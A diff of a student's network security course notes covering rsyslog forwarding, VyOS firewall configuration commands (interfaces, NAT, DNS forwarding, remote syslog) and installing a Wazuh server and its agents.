![image](../assets/143d58a5-5713-4425-b1d5-d8f9dcf63cf0.png)
> **_NOTE:_** the line in sec350.conf means: \
> user = syslog facility \
> notice = syslog priority \
> @=UDP, @@ means TCP, so we are only going to send UDP \
> 172.16.50.5 = Remote Syslog Server
#### loggin authpriv messages on linux systems
![image](../assets/77c2b1f5-6aa2-4e76-8db6-59feb31cb4fb.png)
### create test log
- `logger -t test TESTLOG123`

63
net-sec-controls-sec350/vyos.md Normal file
View file

@ -0,0 +1,63 @@
# VyOS
an open source networking OS based on Debian \
https://docs.vyos.io/en/sagitta/
## Overview
- VyOS has two modes: operational and configuration mode
- The operational mode is used to view the system status and run commands (command prompt displays `$`)
- the configuration mode is used to modify the system configuration (command prompt displays `#`)
## Commands
### Basics
- enter configuration mode from operational mode: `configure`
- exit configuration mode: `exit`
- commit current set of changes `commit`
- save current changes: `save`
- `commit`, followed by `save` will save configuration changes
### Change Password
```
set system login user vyos authentication plaintext-password [password]
```
### Set Hostname
```
set system host-name fw01-charlotte
```
### Interfaces
- set IP: `set interfaces ethernet ethX address 172.16.50.X./24`
- add description: `set interfaces ethernet ethX description SEC350-WAN`
- `show interfaces`
### Gateway and DNS Server
- create default route (gateway): `set protocols static route 0.0.0.0/0 next-hop 10.0.17.2`
- set DNS server: `set system name-server 10.0.17.2`
### NAT
```
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
show nat source translations
```
### DNS Forwarding
```
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
set service dns forwarding system
```
### Forward authentication events from vyos to a remote syslog server
```
set system syslog host 172.16.50.5 facility authpriv level info
```
### Export configuration
```
show configuration commands | grep -v "syslog global\|ntp\|login\|console\|config\|hw-id\|loopback\|conntrack"
```

28
net-sec-controls-sec350/wazuh.md Normal file
View file

@ -0,0 +1,28 @@
# Wazuh
## Installing Server
- run the following command: `curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i`
- remember to save the auto-generated password
### Ports to open on firewall
- **1514/TCP** for agent communication.
- **1515/TCP** for enrollment via automatic agent request.
- **55000/TCP** for enrollment via Wazuh server API.
## Installing Agents
- Wazuh dropdown > Agents > enter agent configurations
- run the generated command on the remote system to install the agent:
- start agent service:
```
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## Agent directory structure
Wazuh agent files are stored in /var/ossec/. Key directories include:
- `/var/ossec/etc/` - Configuration files
- `/var/ossec/etc/ossec.conf` - agent IP settings
- `/var/ossec/logs/` - Log files
- `/var/ossec/queue/` - Communication queue
- `/var/ossec/agentless/` - Agentless monitoring